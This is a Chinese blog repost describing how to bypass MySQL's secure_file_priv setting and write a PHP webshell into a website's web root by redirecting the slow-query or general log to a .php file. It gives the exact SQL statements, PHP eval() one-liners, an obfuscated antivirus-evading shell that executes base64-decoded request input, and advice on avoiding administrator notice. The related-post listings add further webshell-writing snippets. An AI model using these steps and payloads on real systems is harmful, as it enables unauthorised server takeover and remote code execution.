mysql之突破文件写入_mysql之突破secure_file_priv写webshell

最新推荐文章于 2021-04-15 22:59:51 发布
最新推荐文章于 2021-04-15 22:59:51 发布
阅读量136 收藏
点赞数
文章标签: mysql之突破文件写入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39606019/article/details/113945119
版权

在某些情况下,当我们进入了一个网站的phpMyAdmin时,想通过select into outfile来写shell,但是通常都会报错。

20200530134921414196.png

这是因为在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL。并且无法用sql语句对其进行修改,只能够通过以下方式修改

162f8fdf6b6f762e415ea3d8da446ab2.png

日志利用:

方法一:

慢查询日志  (slow query log)

mysql也具有日志,我们也可以通过日志来getshell。

mysql日志主要包含:错误日志、查询日志、慢查询日志、事务日志,日志的详细情况参考mysql日志详细解析

我们主要利用慢查询日志来写shell,步骤大致分为三步:

1.设置slow_query_log=1.即启用慢查询日志(默认禁用)。

set global slow_query_log=1;

af43140b517d2a9c988cd73867782ca1.png

2.伪造(修改)slow_query_log_file日志文件的绝对路径以及文件名

set global slow_query_log_file=‘D:/phpStudy/PHPTutorial/WWW/hacker.php‘

641fedb0110e1bc7fc02a8f149060bd0.png

3.向日志文件写入shell

select ‘<?php eval($_POST[x]);?>‘ or sleep(11);

3692a64b34b39bbd6b9bbd6aeb5bc4fb.png

4.用菜刀连接拿到shell

8ba4cdcd844395a4af1abd5b495cbf02.png

Ps:

对慢查询日志的补充:

因为是用的慢查询日志,所以说只有当查询语句执行的时间要超过系统默认的时间时,该语句才会被记入进慢查询日志。

时间默认超过多少的称为慢查询日志?

一般都是通过long_query_time选项来设置这个时间值,时间以秒为单位,可以精确到微秒。如果查询时间超过了这个时间值(默认为10秒),这个查询语句将被记录到慢查询日志中。查看服务器默认时间值方式如下:

show global variables like ‘%long_query_time%‘

cc43d1ee0a8f923ce510609475438fe8.png

通常情况下执行sql语句时的执行时间一般不会超过10s,所以说这个日志文件应该是比较小的,而且默认也是禁用状态,不会引起管理员的察觉。

方法二:

一般查询日志  (general log)

outfile被禁止,或者写入文件被拦截

在数据库中操作如下:(必须是root权限)

1.show variables like ‘%general%‘; #查看配置

2.set global general_log = on; #开启general log模式

3.set global general_log_file = ‘/var/www/html/1.php‘; #设置日志目录为shell地址

4.select ‘<?php eval($_POST[cmd]);?>’ #写入shell

不成功的案例,如果mysql 被降权,是无法写入到其他的站点目录的,除非你的目标目录是可以写入的。

SQL查询免杀shell的语句

SELECT “<?php $p = array(‘f’=>’a’,’pffff’=>’s’,’e’=>’fffff’,’lfaaaa’=>’r’,’nnnnn’=>’t’);$a = array_keys($p);$_=$p[‘pffff’].$p[‘pffff’].$a[2];$_= ‘a’.$_.’rt‘;$_(base64_decode($_REQUEST[‘username’]));?>”

原文:https://www.cnblogs.com/zzjdbk/p/12992186.html

weixin_39606019
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WEB安全之:Mysql 数据库 SQL 注入(三)
f_carey的博客
06-01 417
郑重声明: 本笔记编目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Mysql 数据库 SQL 注入(三)4 `secure_file_priv` :文件操作4.1 LOAD_FILE() 读文件4.1.1 系统常用目录文件4.2 `LOAD DATA INFILE` 导入文件内容到数据库4.3 `into outfile/dumpfile` 写入文件 4 secure_f.
利用mysqlwebshell_【教程】利用MySQLwebshell
weixin_39612038的博客
01-19 297
利用MySQLwebshell前提:在知道数据库地址、数据库用户名、密码的情况下(先在本地的数据库验证一下想法的可行性)1.打开任意数据库并创建一个表create TABLE a (cmd text NOT NULL);2.插入一句话木马insert INTO a (cmd) VALUES('');3.导出一句话木马 (通过phpinfo发现绝对路径)select cmd from a into...
MYSQL突破secure_file_privshell
W小哥
11-19 1453
目标IP地址:192.168.106.130 本地IP地址:192.168.106.1 访问目标网络如下图所示: 实验场景: 某些情况下,当我们进入网站phpmyadmin或者网站后台执行SQL命令,计划通过select into outfile一句话木马(shell),但是通常都会报错,如下图所示: 原因: 在mysqlsecure_file_priv的值默认为NULL。并且无法用s...
phpMyAdmin突破secure-file-privWebShell
可爱的我可爱的code
11-19 895
欢迎到我的博客查看原文 1.查看secure_file_priv值 show global variables like '%secure_file_priv%'; # show global variables like '%secure%'; # 此开关默认为NULL:即不允许导入导出 # 没有具体值时:表示不对mysqld 的导入|导出做限制 # 值为/tmp/ :表示限制mysqld 的导入|导出只能发生在/tmp/目录下 2.查询操作日志存放路径 show variables like '.
mysql注入 爆库_Mysql暴错注入代码-webshell
weixin_27956639的博客
02-02 139
MySql Error Based Injection Reference[Mysql暴错注入参考]Author:Pnig0s1992Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功小部分版本使用name_const()时会报错.可以用给出的Method.2测试查询版本:Method.1:and+exists(select*from+(select*from(select+na...
Mysql注入中的outfile、dumpfile、load_file函数详解
09-09
该参数的值可以通过`SELECT @@secure_file_priv`查询,但不能在运行时动态更改,需要在MySQL配置文件中修改后重启服务。 在SQL注入攻击中,理解这三个函数的特性至关重要。攻击者可能会利用它们来读取敏感信息(如`...
phpmyadmin突破secure_file_privshell 的渗透
qq_45906009的博客
06-22 570
有一天在公司,突然想起来自己有一个靶机没有复现漏洞,须视乎,搞一下子 首先通过VMware,我将虚拟机安装了。 上面是这台虚拟机的IP地址,二话不说拿7kb扫一下网站。 我们发现这个网站有一个phpmyadmin,二话不说试一下默认密码root/root 果然登录成功了 既然是root权限 那我们不上传shell 自己都看不下去 上次webshell需要有俩个条件 有读的权限 知道文件的绝对路径(这里我们知道 文件的绝对路径是什么 因为靶机在手 哈哈哈 ) 我们选择mysql数据库 看一下
第01篇:MySQL注入点WebShell的5种方式1
08-03
本文将探讨如何利用MySQL注入点写入WebShell的五种方法,重点关注条件和具体步骤。 首先,确保存在一个可利用的MySQL注入点至关重要。这通常发生在应用程序的输入验证不足,使得攻击者可以插入额外的SQL代码到查询...
mysqlwebshell总结
weixin_33795833的博客
10-24 233
1、select '<?php eval($_POST[jumbo]) ?>' into outfile '/var/www/jumbo.php'; 2、select '<?php eval($_POST[jumbo]) ?>' into dumpfile '/var/www/jumbo.php'; 3、Drop TABLE IF EXISTS temp;Creat...
mysql脱库_php+mysql注入拿webshell到脱库
weixin_29103027的博客
01-19 589
注:此文章献给那些还对注入不怎么理解的人学习!本次实站过程已经过去一个月了,但是还是出这个文章,来跟大家分享一下希望大家都能喜欢,就算这次大家再找到此战漏洞也别破坏,毕竟我们只是学习一下!目标站:http://www.XXXteam.cn/注入点:http://www.XXXteam.cn/newmess.php?id=138找到注入点后猜字段,可用 order by 1 猜解,order by...
MySQL导出一句话拿WebShell的方法
06-19
MySQL导出一句话拿WebShell的方法
Mysql示例数据库sql文件打包下载
09-17
Mysql示例数据库sql文件打包下载,测试学习mysql数据库,非常有用。也可以直接去mysql官方网站下载:https://dev.mysql.com/doc/
PhpMyadmin利用Mysql root密码获取webshell
weixin_33739523的博客
05-23 220
Simeon   Phpmyadmin是一款著名的mysql在线管理系统,通过提供的mysql数据库用户账号和密码对所管理的数据库实施操作。在***过程中,一旦获取其mysql账号和对应的密码,轻者获取其账号所管理数据库,重者可以配合其它漏洞获取webshell权限和系统权限。Root账号及口令可以通过暴力破解,源代码泄露等途径获取,本文主要就其root账号获取以及phpmyadmin的利用、如何...
asp写入mysqlshell_MySQL注入点webshell的五种方式
weixin_39540018的博客
12-20 80
0x00 数据的前提1,在mysql的配置文件 my.ini 中,secure_file_priv="c:/wamp64/tmp"被注释 或者`secure_file_priv配置的位置是web目录。2,未开启全局gpc。(php5.329之后就没有magic_quotes_gpc)0x01 union select 写入最常见的写入方式,union select 后跟 into outf...
SQL注入文件操作
qq_43936524的博客
04-15 631
文章目录函数文件前提条件写入函数日志文件前提条件日志种类慢查询日志读文件前提条件读取函数参考文章 函数文件 前提条件 1.有网站的绝对路径 2.数据库secure_file_priv包含了写入的路径 secure_file_priv secure_file_priv 为 NULL 时,表示限制mysqld不允许导入或导出。 secure_file_priv 为 /tmp 时,表示限制mysqld只能在/tmp目录中执行导入导出,其他目录不能执行。 secure_file_priv 没有值时,表示不限
asp写入mysqlshell_拿webshell方法总结
weixin_39700063的博客
12-20 515
一、直接上传获得webshell这种对php和jsp的一些程序比较常见,MolyXBOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文件url应该是http://forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件文件名是原来的文件名,bo-blog后台可以可以直接上传.php文件,上传的文...
mysql dede arctiny_实战篇:织梦.PHP.Mysql注入webshell.脱库
weixin_42208901的博客
01-27 157
目标站:http://www.51team.cn/注入点:http://www.51team.cn/newmess.php?id=138找到注入点后猜字段,可用 order by 1 猜解,order by不可用时,可用union 联合查询!我这里猜解到的字段是22, 看图 接下来爆显示位!语法: and 1=2 union select1,2,4,5,...,22 字段多少就输入多少,中间太常,...
mysql修改secure_file_priv
最新发布
05-26
如果未设置secure_file_priv,则默认情况下,这些操作将被允许在任何目录中读取和写入文件。 要修改secure_file_priv,您可以按照以下步骤进行操作: 1.登录MySQL服务器并以管理员身份运行以下命令: ``` mysql -...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值